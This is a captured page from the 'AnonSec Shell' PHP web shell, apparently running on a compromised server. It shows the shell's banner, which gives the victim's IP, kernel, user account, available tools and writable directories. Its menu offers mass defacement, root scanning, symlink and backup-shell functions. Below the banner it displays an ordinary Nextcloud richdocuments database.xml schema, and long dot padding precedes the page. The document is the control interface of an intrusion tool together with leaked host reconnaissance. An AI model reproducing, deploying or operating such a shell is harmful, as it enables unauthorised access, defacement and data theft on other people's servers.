. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 85.13.141.101  /  Your IP : 216.73.216.95   [ Reverse IP ]
Web Server : Apache
System : Linux dd40236 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User : w00ad34b ( 1052)
PHP Version : 8.2.30-nmm1
Disable Function : NONE
Domains : 429 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /www/htdocs/w00ad34b/spd-cloud/apps/richdocuments/appinfo/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /www/htdocs/w00ad34b/spd-cloud/apps/richdocuments/appinfo/database.xml
<?xml version="1.0" encoding="ISO-8859-1" ?>
<database>
	<name>*dbname*</name>
	<create>true</create>
	<overwrite>false</overwrite>
	<charset>utf8</charset>
	<table>
		<name>*dbprefix*richdocuments_member</name>
		<declaration>

			<field>
				<name>member_id</name>
				<type>integer</type>
				<notnull>true</notnull>
				<autoincrement>1</autoincrement>
				<unsigned>true</unsigned>
				<length>4</length>
				<comments>Unique per user and session</comments>
			</field>
			<field>
				<name>uid</name>
				<type>text</type>
				<length>64</length>
			</field>
			<field>
				<name>color</name>
				<type>text</type>
				<length>32</length>
			</field>
			<field>
				<name>last_activity</name>
				<type>integer</type>
				<unsigned>true</unsigned>
				<length>4</length>
			</field>
			<field>
				<name>is_guest</name>
				<type>integer</type>
				<default>0</default>
				<notnull>true</notnull>
				<unsigned>true</unsigned>
				<length>1</length>
			</field>
			<field>
				<name>token</name>
				<type>text</type>
				<default></default>
				<notnull>false</notnull>
				<length>32</length>
			</field>
			<field>
				<name>status</name>
				<type>integer</type>
				<default>1</default>
				<notnull>true</notnull>
				<unsigned>true</unsigned>
				<length>1</length>
			</field>

		</declaration>
	</table>

	<table>
		<name>*dbprefix*richdocuments_wopi</name>
		<declaration>
			<field>
				<name>id</name>
				<type>integer</type>
				<notnull>true</notnull>
				<autoincrement>1</autoincrement>
				<unsigned>true</unsigned>
				<length>4</length>
			</field>
			<field>
				<name>owner_uid</name>
				<type>text</type>
				<length>64</length>
			</field>
			<field>
				<name>editor_uid</name>
				<type>text</type>
				<length>64</length>
			</field>
			<field>
				<name>guest_displayname</name>
				<type>text</type>
				<length>64</length>
			</field>
			<field>
				<name>fileid</name>
				<type>integer</type>
				<notnull>true</notnull>
				<length>4</length>
			</field>
			<field>
				<name>version</name>
				<type>integer</type>
				<notnull>true</notnull>
				<default>0</default>
				<length>4</length>
			</field>
			<field>
				<name>canwrite</name>
				<type>boolean</type>
				<default>false</default>
				<notnull>true</notnull>
			</field>
			<field>
				<name>server_host</name>
				<type>text</type>
				<default>localhost</default>
				<notnull>true</notnull>
			</field>
			<field>
				<name>token</name>
				<type>text</type>
				<default></default>
				<notnull>true</notnull>
				<length>32</length>
			</field>
			<field>
				<name>expiry</name>
				<type>integer</type>
				<unsigned>true</unsigned>
				<length>4</length>
			</field>
			<field>
				<name>template_destination</name>
				<type>integer</type>
				<notnull>false</notnull>
				<length>4</length>
			</field>

			<index>
				<name>rd_wopi_token_idx</name>
				<unique>true</unique>
				<field>
					<name>token</name>
					<sorting>ascending</sorting>
				</field>
			</index>
		</declaration>
	</table>

	<table>
		<name>*dbprefix*richdocuments_direct</name>
		<declaration>
			<field>
				<name>id</name>
				<type>integer</type>
				<notnull>true</notnull>
				<autoincrement>1</autoincrement>
				<unsigned>true</unsigned>
				<length>4</length>
			</field>
			<field>
				<name>token</name>
				<type>text</type>
				<length>64</length>
			</field>
			<field>
				<name>uid</name>
				<type>text</type>
				<length>64</length>
			</field>
			<field>
				<name>fileid</name>
				<type>integer</type>
				<notnull>true</notnull>
				<length>4</length>
			</field>
			<field>
				<name>timestamp</name>
				<type>integer</type>
				<notnull>true</notnull>
				<unsigned>true</unsigned>
				<length>4</length>
				<default>0</default>
			</field>
			<field>
				<name>template_destination</name>
				<type>integer</type>
				<notnull>false</notnull>
				<length>4</length>
			</field>

			<index>
				<name>rd_direct_token_idx</name>
				<unique>true</unique>
				<field>
					<name>token</name>
					<sorting>ascending</sorting>
				</field>
			</index>
			<index>
				<name>rd_direct_timestamp_idx</name>
				<unique>false</unique>
				<field>
					<name>timestamp</name>
					<sorting>ascending</sorting>
				</field>
			</index>
		</declaration>
	</table>

	<table>
		<name>*dbprefix*richdocuments_assets</name>
		<declaration>
			<field>
				<name>id</name>
				<type>integer</type>
				<notnull>true</notnull>
				<autoincrement>1</autoincrement>
				<unsigned>true</unsigned>
				<length>4</length>
			</field>
			<field>
				<name>uid</name>
				<type>text</type>
				<length>64</length>
			</field>
			<field>
				<name>fileid</name>
				<type>integer</type>
				<notnull>true</notnull>
				<length>4</length>
			</field>
			<field>
				<name>token</name>
				<type>text</type>
				<length>64</length>
			</field>
			<field>
				<name>timestamp</name>
				<type>integer</type>
				<notnull>true</notnull>
				<default>0</default>
				<unsigned>true</unsigned>
				<length>4</length>
			</field>

			<index>
				<name>rd_assets_token_idx</name>
				<unique>true</unique>
				<field>
					<name>token</name>
					<sorting>ascending</sorting>
				</field>
			</index>
			<index>
				<name>rd_assets_timestamp_idx</name>
				<unique>true</unique>
				<field>
					<name>timestamp</name>
					<sorting>ascending</sorting>
				</field>
			</index>

		</declaration>
	</table>
</database>

Anon7 - 2022
AnonSec Team